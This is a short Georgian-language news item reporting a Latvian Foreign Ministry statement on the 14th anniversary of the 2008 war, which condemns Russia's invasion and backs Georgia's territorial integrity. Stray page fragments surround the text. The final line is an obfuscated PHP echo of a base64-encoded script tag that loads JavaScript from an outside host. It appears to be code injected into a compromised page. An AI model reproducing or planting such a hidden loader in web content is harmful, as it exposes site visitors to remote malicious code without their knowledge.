celsiusi
ავერსი საქკაბელი
ლატვიის საგარეო საქმეთა სამინისტრო აგვისტოს ომის 14 წლისთავთან დაკავშირებით განცხადებას ავრცელებს.
 
როგორც უწყებაში აცხადებენ, ლატვია გმობს 2008 წელს რუსეთის შემოჭრას და მხარს უჭერს საქართველოს სუვერენიტეტსა და ტერიტორიულ მთლიანობას.
 
"ჩვენ გვახსოვს და ვგმობთ 2008 წელს საქართველოში რუსეთის ცინიკურ შეჭრას. მტკიცე მხარდაჭერას გამოვხატავთ საქართველოს სუვერენულობისა და ტერიტორიული მთლიანობისადმი. ამ ომმა სამხრეთ კავკასიაში რეგიონული უსაფრთხოების ლანდშაფტი შეცვალა და საქართველოს უდიდესი პოლიტიკური და ეკონომიკური ზიანი მიაყენა", - ნათქვამია განცხადებაში.
 
 
506
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");